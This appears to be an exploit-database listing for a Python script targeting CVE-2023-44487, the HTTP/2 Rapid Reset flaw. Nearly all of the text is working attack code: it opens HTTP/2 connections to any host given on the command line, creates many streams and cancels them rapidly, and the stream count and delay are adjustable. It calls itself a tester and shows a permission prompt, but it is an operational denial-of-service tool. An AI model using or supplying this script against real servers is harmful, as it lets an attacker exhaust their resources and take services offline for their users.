HTTP/2 2.0 - Denial Of Service (DOS)



EKU-ID: 56286 CVE: CVE-2023-44487 OSVDB-ID:
Author: Madhusudhan Rajappa Published: 2025-09-16 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""

import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics

try:
    import h2.connection
    import h2.events
    import h2.exceptions
    import h2.config
except ImportError:
    print("Error: h2 library not installed. Install with: pip install h2")
    exit(1)

# Configure logging
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

class HTTP2RapidResetTester:
    """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability."""

    def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
        self.host = host
        self.port = port
        self.use_ssl = use_ssl
        self.connection = None
        self.reader = None
        self.writer = None
        self.response_times = []
        self.errors = []
        self.connection_closed = False

    async def connect(self) -> bool:
        """Establish HTTP/2 connection to the target server."""
        try:
            logger.info(f"Connecting to {self.host}:{self.port}")

            if self.use_ssl:
                ssl_context = ssl.create_default_context()
                ssl_context.set_alpn_protocols(['h2'])
                self.reader, self.writer = await asyncio.open_connection(
                    self.host, self.port, ssl=ssl_context
                )
            else:
                self.reader, self.writer = await asyncio.open_connection(self.host, self.port)

            # Initialize HTTP/2 connection
            config = h2.config.H2Configuration(client_side=True)
            self.connection = h2.connection.H2Connection(config=config)
            self.connection.initiate_connection()

            # Send connection preface
            await self._send_data(self.connection.data_to_send())

            logger.info("HTTP/2 connection established successfully")
            self.connection_closed = False
            return True

        except Exception as e:
            logger.error(f"Failed to establish connection: {e}")
            return False

    async def _send_data(self, data: bytes):
        """Send data to the server."""
        if data and self.writer and not self.connection_closed:
            try:
                self.writer.write(data)
                await self.writer.drain()
            except (ConnectionResetError, BrokenPipeError, OSError) as e:
                logger.debug(f"Connection error while sending data: {e}")
                self.connection_closed = True

    async def _receive_data(self) -> bytes:
        """Receive data from the server."""
        try:
            if self.connection_closed or not self.reader:
                return b''
            data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0)
            if not data:
                self.connection_closed = True
            return data
        except asyncio.TimeoutError:
            return b''
        except (ConnectionResetError, BrokenPipeError, OSError) as e:
            logger.debug(f"Connection error while receiving data: {e}")
            self.connection_closed = True
            return b''

    async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
        """
        Perform the rapid reset attack test.

        Args:
            num_streams: Number of streams to create and reset
            delay: Delay between stream creations (seconds)

        Returns:
            Dictionary with test results
        """
        logger.info(f"Starting rapid reset test with {num_streams} streams")

        start_time = time.time()
        created_streams = []
        reset_streams = []

        try:
            # Phase 1: Rapidly create streams
            for i in range(num_streams):
                if self.connection_closed:
                    logger.warning("Connection closed during stream creation")
                    break

                stream_id = (i * 2) + 1  # Odd numbers for client-initiated streams

                # Create HTTP/2 headers
                headers = [
                    (':method', 'GET'),
                    (':path', '/'),
                    (':scheme', 'https' if self.use_ssl else 'http'),
                    (':authority', self.host),
                    ('user-agent', 'CVE-2023-44487-Tester/1.0'),
                ]

                try:
                    # Send headers to create stream
                    self.connection.send_headers(stream_id, headers)
                    await self._send_data(self.connection.data_to_send())
                    created_streams.append(stream_id)

                    # Small delay to avoid overwhelming the connection
                    if delay > 0:
                        await asyncio.sleep(delay)

                except Exception as e:
                    self.errors.append(f"Error creating stream {stream_id}: {e}")
                    if "connection" in str(e).lower():
                        break

            logger.info(f"Created {len(created_streams)} streams")

            # Phase 2: Rapidly reset all streams
            reset_start = time.time()
            for stream_id in created_streams:
                if self.connection_closed:
                    logger.warning("Connection closed during stream reset")
                    break

                try:
                    # Send RST_STREAM frame to cancel the request
                    self.connection.reset_stream(stream_id, error_code=0x8)  # CANCEL error code
                    await self._send_data(self.connection.data_to_send())
                    reset_streams.append(stream_id)

                    if delay > 0:
                        await asyncio.sleep(delay / 10)  # Faster resets

                except h2.exceptions.StreamClosedError:
                    # Stream already closed, continue
                    pass
                except Exception as e:
                    self.errors.append(f"Error resetting stream {stream_id}: {e}")
                    if "connection" in str(e).lower():
                        break

            reset_duration = time.time() - reset_start
            total_duration = time.time() - start_time

            logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")

            # Phase 3: Monitor server response
            await self._monitor_server_response(timeout=10.0)

            return {
                'streams_created': len(created_streams),
                'streams_reset': len(reset_streams),
                'total_duration': total_duration,
                'reset_duration': reset_duration,
                'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
                'errors': len(self.errors),
                'response_times': self.response_times.copy(),
                'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
                'connection_closed': self.connection_closed
            }

        except Exception as e:
            logger.error(f"Error during rapid reset test: {e}")
            return {'error': str(e)}

    async def _monitor_server_response(self, timeout: float = 10.0):
        """Monitor server responses and measure response times."""
        logger.info("Monitoring server responses...")

        end_time = time.time() + timeout

        while time.time() < end_time and not self.connection_closed:
            try:
                start = time.time()
                data = await self._receive_data()
                response_time = time.time() - start

                if data:
                    self.response_times.append(response_time)

                    try:
                        # Process HTTP/2 events
                        events = self.connection.receive_data(data)
                        for event in events:
                            if isinstance(event, h2.events.ResponseReceived):
                                logger.debug(f"Response received on stream {event.stream_id}")
                            elif isinstance(event, h2.events.StreamReset):
                                logger.debug(f"Stream {event.stream_id} reset by server")
                            elif isinstance(event, h2.events.ConnectionTerminated):
                                logger.warning("Server terminated connection")
                                self.connection_closed = True
                                return
                    except Exception as e:
                        logger.debug(f"Error processing HTTP/2 events: {e}")

                await asyncio.sleep(0.1)

            except Exception as e:
                self.errors.append(f"Error monitoring response: {e}")
                break

    async def baseline_test(self, num_requests: int = 10) -> dict:
        """Perform baseline test with normal HTTP/2 requests."""
        logger.info(f"Performing baseline test with {num_requests} normal requests")

        start_time = time.time()
        successful_requests = 0

        for i in range(num_requests):
            if self.connection_closed:
                logger.warning("Connection closed during baseline test")
                break

            stream_id = (i * 2) + 1

            headers = [
                (':method', 'GET'),
                (':path', '/'),
                (':scheme', 'https' if self.use_ssl else 'http'),
                (':authority', self.host),
                ('user-agent', 'CVE-2023-44487-Baseline/1.0'),
            ]

            try:
                request_start = time.time()
                self.connection.send_headers(stream_id, headers)
                self.connection.end_stream(stream_id)
                await self._send_data(self.connection.data_to_send())

                # Wait for response
                try:
                    data = await asyncio.wait_for(self._receive_data(), timeout=5.0)
                    if data:
                        self.response_times.append(time.time() - request_start)
                        successful_requests += 1
                except asyncio.TimeoutError:
                    logger.warning(f"Timeout waiting for response to request {i+1}")

                await asyncio.sleep(0.1)  # Small delay between requests

            except Exception as e:
                logger.warning(f"Error in baseline request {i+1}: {e}")
                if "connection" in str(e).lower():
                    break

        total_duration = time.time() - start_time

        return {
            'total_requests': num_requests,
            'successful_requests': successful_requests,
            'total_duration': total_duration,
            'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
            'success_rate': successful_requests / num_requests if num_requests > 0 else 0
        }

    async def close(self):
        """Close the connection gracefully."""
        if self.writer and not self.connection_closed:
            try:
                # Try to close the connection gracefully
                if self.connection:
                    try:
                        # Send GOAWAY frame if possible
                        self.connection.close_connection()
                        await self._send_data(self.connection.data_to_send())
                    except Exception as e:
                        logger.debug(f"Error sending GOAWAY frame: {e}")

                # Close the writer
                self.writer.close()

                # Wait for close with timeout to avoid hanging
                try:
                    await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0)
                except asyncio.TimeoutError:
                    logger.debug("Timeout waiting for connection to close")
                except (ConnectionResetError, BrokenPipeError, OSError):
                    # Connection already closed by peer, this is expected
                    pass

            except Exception as e:
                logger.debug(f"Error during connection cleanup: {e}")
            finally:
                self.connection_closed = True

async def main():
    parser = argparse.ArgumentParser(
        description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
        epilog='WARNING: Only use on systems you own or have permission to test!'
    )
    parser.add_argument('host', help='Target hostname')
    parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
    parser.add_argument('-s', '--streams', type=int, default=100,
                       help='Number of streams for rapid reset test (default: 100)')
    parser.add_argument('-d', '--delay', type=float, default=0.001,
                       help='Delay between stream operations (default: 0.001s)')
    parser.add_argument('--baseline-only', action='store_true',
                       help='Only perform baseline test')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')

    args = parser.parse_args()

    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)

    print("=" * 60)
    print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
    print()

    # Legal disclaimer
    print("LEGAL DISCLAIMER:")
    print("This tool is for authorized security testing only.")
    print("Ensure you have permission to test the target system.")
    print("Unauthorized use may be illegal.")
    print()

    response = input("Do you have permission to test this system? (yes/no): ")
    if response.lower() != 'yes':
        print("Exiting. Only use this tool on systems you're authorized to test.")
        return

    tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)

    try:
        # Connect to target
        if not await tester.connect():
            logger.error("Failed to establish connection. Exiting.")
            return

        # Perform baseline test
        print("\n" + "="*40)
        print("BASELINE TEST")
        print("="*40)
        baseline_results = await tester.baseline_test()

        print(f"Baseline Results:")
        print(f"  Total Requests: {baseline_results['total_requests']}")
        print(f"  Successful: {baseline_results['successful_requests']}")
        print(f"  Success Rate: {baseline_results['success_rate']:.2%}")
        print(f"  Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
        print(f"  Total Duration: {baseline_results['total_duration']:.3f}s")

        if not args.baseline_only:
            # Reset connection for rapid reset test
            await tester.close()
            tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)

            if not await tester.connect():
                logger.error("Failed to re-establish connection for rapid reset test.")
                return

            # Perform rapid reset test
            print("\n" + "="*40)
            print("RAPID RESET TEST (CVE-2023-44487)")
            print("="*40)
            print(f"Testing with {args.streams} streams...")

            rapid_results = await tester.rapid_reset_test(args.streams, args.delay)

            if 'error' in rapid_results:
                print(f"Test failed: {rapid_results['error']}")
            else:
                print(f"Rapid Reset Results:")
                print(f"  Streams Created: {rapid_results['streams_created']}")
                print(f"  Streams Reset: {rapid_results['streams_reset']}")
                print(f"  Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
                print(f"  Total Duration: {rapid_results['total_duration']:.3f}s")
                print(f"  Reset Duration: {rapid_results['reset_duration']:.3f}s")
                print(f"  Errors: {rapid_results['errors']}")
                print(f"  Avg Response Time: {rapid_results['avg_response_time']:.3f}s")

                if rapid_results.get('connection_closed'):
                    print(f"  Connection Status: Server closed connection during test")

                # Analysis
                print("\n" + "="*40)
                print("VULNERABILITY ANALYSIS")
                print("="*40)

                if rapid_results.get('connection_closed'):
                    print("Server closed connection during rapid reset test")
                    print("   This could indicate protective measures or resource exhaustion.")

                if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
                    print("WARNING: Server may have rejected many reset requests")
                    print("   This could indicate protective measures are in place.")

                if rapid_results['reset_rate'] > 1000:
                    print("HIGH RISK: Server accepts very high reset rates")
                    print("   This may indicate vulnerability to CVE-2023-44487")

                elif rapid_results['reset_rate'] > 100:
                    print("MEDIUM RISK: Server accepts moderate reset rates")
                    print("   Further testing may be needed")

                else:
                    print("LOWER RISK: Server has rate limiting on resets")
                    print("   This suggests some protection against the vulnerability")

                if len(tester.errors) > rapid_results['streams_created'] * 0.1:
                    print("Many errors occurred during testing")
                    print("   Results may not be reliable")

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
    except Exception as e:
        logger.error(f"Unexpected error: {e}")
    finally:
        try:
            await tester.close()
        except Exception as e:
            logger.debug(f"Error during final cleanup: {e}")
        print("\nTest completed.")

if __name__ == "__main__":
    print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
    print("Requires: pip install h2")
    print()

    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print("\nExiting...")
    except Exception as e:
        logger.error(f"Fatal error: {e}")